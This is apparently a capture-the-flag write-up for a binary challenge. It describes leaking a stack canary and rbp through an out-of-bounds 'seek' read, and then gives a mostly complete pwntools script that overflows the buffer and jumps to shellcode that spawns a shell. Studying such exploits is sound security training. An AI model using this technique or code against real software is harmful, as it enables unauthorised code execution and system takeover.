using the book 'seek' function we can read past the array boundary and leak memory

we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)

Get stack canary

r.sendline("1") r.recvuntil(">") r.clean()

r.sendline("memory.txt") r.recvuntil("continue?") r.sendline("s30729") # last byte of stack canary is a null byte (probably ubuntu: http://phrack.org/issues/67/13.html)

r.recvuntil("more love!\n\n\n")

canary = u64("\x00"+r.recvn(7)) log.info("Got the stack canary: 0x%x" % canary)

r.sendline("n") r.recvuntil(">") r.clean()

Get rbp

r.sendline("1") r.recvuntil(">") r.clean() r.sendline("memory.txt") r.recvuntil("continue?") r.sendline("s30736")

r.recvuntil("more love!\n\n\n") getrbp = r.recvn(6) assert getrbp[5] == "\x7f" rbp = u64(getrbp + "\x00\x00")

log.info("rbp is at 0x%x" % rbp)

r.sendline("n") r.recvuntil(">") r.clean()

Smash it!

r.sendline("1") r.recvuntil(">") r.clean()

r.sendline("A"31304 + p64(canary) + p64(rbp) + p64(rbp+32) + "\x90"100 + asm(shellcraft.setresuid(1001,1001,1001) + shellcraft.setresgid(1001,1001,1001) + shellcraft.sh())) r.interactive()

Original writeup (https://gist.github.com/c3c/1407e165d925026e018662b7d7d4d5c6).

bookshellf

using the book 'seek' function we can read past the array boundary and leak memory

we can leak the stack canary and rbp, then produce an overflow and overwrite rip while pointing to our shellcode (NX is not set)

Get stack canary

Get rbp

Smash it!

Comments

Sign in with